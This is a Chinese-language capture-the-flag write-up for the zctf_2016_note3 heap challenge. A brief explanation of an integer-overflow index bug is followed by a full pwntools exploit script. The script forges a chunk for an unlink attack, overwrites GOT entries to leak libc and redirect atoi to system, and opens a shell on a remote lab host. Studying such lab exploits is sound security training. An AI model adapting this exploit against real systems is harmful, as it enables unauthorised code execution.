zctf_2016_note3

zctf_2016_note3

首先檢查一下程序的保護機制

然後用IDA分析一下，edit裏存在一個整數溢出導致堆溢出的漏洞。當輸入爲0x8000000000000000時，即可使得index爲-1；由於輸入的長度不夠，因此將0x8000000000000000轉爲負數的形式（即 -0x8000000000000000）輸入進去即可。然後就是正常的unlink了。

#coding:utf8
from pwn import *

# Connection and binary setup for the writeup's exploit script (Python 2 / pwntools).
#sh = process('./zctf_2016_note3')   # local run, kept for reference
sh = remote('node3.buuoj.cn', 29603)
elf = ELF('./zctf_2016_note3')
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')

# GOT / PLT slots the script reads and overwrites further down.
atoi_got, free_got = elf.got['atoi'], elf.got['free']
puts_plt = elf.plt['puts']

# Address of the binary's note-0 pointer slot (presumably the global note table;
# value taken from the writeup).
heap_0_ptr_addr = 0x6020C8

def add(size,content):
   """Drive the service's 'add note' menu option (choice 1).

   Sends the option, then ``size``, then ``content`` truncated to
   ``size - 1`` bytes.  The content is sent raw (no trailing newline).
   Uses the module-level ``sh`` tube.
   """
   conn = sh
   conn.sendlineafter('option--->>', '1')
   conn.sendlineafter('(less than 1024)', str(size))
   body = content[:size - 1]
   conn.sendafter('content:', body)

def edit(index,content):
   """Drive the service's 'edit note' menu option (choice 3).

   Sends the option and ``str(index)`` line-terminated, then ``content``
   raw -- callers append their own newline.  ``index`` may be negative;
   ``str()`` then emits the sign.  Uses the module-level ``sh`` tube.
   """
   steps = (
      (sh.sendlineafter, 'option--->>', '3'),
      (sh.sendlineafter, 'Input the id of the note:', str(index)),
      (sh.sendafter, 'Input the new content:', content),
   )
   for send, prompt, data in steps:
      send(prompt, data)

def delete(index):
   """Drive the service's 'delete note' menu option (choice 4).

   Sends the option followed by ``str(index)``, each line-terminated.
   Uses the module-level ``sh`` tube.
   """
   note_id = str(index)
   for prompt, answer in (('option--->>', '4'), ('Input the id of the note:', note_id)):
      sh.sendlineafter(prompt, answer)

# ---- exploit sequence, as given in the writeup (Python 2 syntax: print statement, str payloads) ----
# Root cause per the writeup: edit() takes a note index that wraps to -1 on integer
# overflow, so the write lands in heaps[-1] and overflows an adjacent chunk.
# The program-side fix is to bounds-check the index (including negative values)
# before indexing the note table.
# note 0
add(0x100,'a'*0x100)
# note 1
add(0x100,'b'*0x100)
# note 2
add(0x10,'c'*0x10)
# note 3
add(0x10,'c'*0x10)
# note 4
add(0x10,'c'*0x10)
# note 5
add(0x10,'c'*0x10)
# note 6
add(0x10,'c'*0x10)
# free and re-add note 0 so that heaps[-1] refers to the same chunk as heaps[0]
delete(0)
add(0x100,'a'*0x100)
# now, with index -1, chunk 0 can be overflowed
# fake chunk inside note 0: header (prev_size 0, size 0x101) then fd/bk pointing
# just below the note-0 pointer slot -- the unlink layout the writeup refers to
payload = p64(0) + p64(0x101)
payload += p64(heap_0_ptr_addr - 0x18) + p64(heap_0_ptr_addr - 0x10)
payload = payload.ljust(0x100,'a')   # pad to the end of note 0
# overwrite note 1's chunk header: prev_size 0x100, size 0x110 (low bit clear)
payload += p64(0x100) + p64(0x110)
payload += '\n'   # trailing newline, as in every other edit() payload below
# index = -0x8000000000000000 (0x8000000000000000 expressed as a signed value, see writeup)
edit(0x8000000000000000 - 0x10000000000000000,payload)
# unlink: freeing note 1 unlinks the forged previous chunk
delete(1)
# NOTE: this payload is assembled but never sent -- the edit() call below rebuilds
# its first part inline; dead code left from the writeup.
payload = p64(0) * 3 + p64(free_got) + p64(atoi_got) *2
payload = payload.ljust(80,'\x00')
payload += p64(0x8)*3
# after the unlink, note 0 points into the note table itself (heap_0_ptr_addr - 0x18);
# rewrite it so note 0 -> free@got and notes 1, 2 -> atoi@got
edit(0,p64(0) * 3 + p64(free_got) + p64(atoi_got) *2 + '\n')
# overwrite free's GOT entry with puts's PLT entry
# (7 bytes only: the top byte of an x86-64 user-space address is 0)
edit(0,p64(puts_plt)[0:7] + '\n')
# leak atoi's address: delete(1) now calls puts(atoi@got)
delete(1)
sh.recvuntil('\n')
# 6 significant address bytes, zero-padded to 8 for u64
atoi_addr = u64(sh.recv(6).ljust(8,'\x00'))
libc_base = atoi_addr - libc.sym['atoi']
system_addr = libc_base + libc.sym['system']
print 'libc_base=',hex(libc_base)
print 'system_addr=',hex(system_addr)
# overwrite atoi's GOT entry with the address of system
edit(2,p64(system_addr)[0:7] + '\n')
# get shell: the menu option is presumably parsed with atoi(), which is now system()
sh.sendlineafter('option--->>','/bin/sh\x00')

sh.interactive()

 
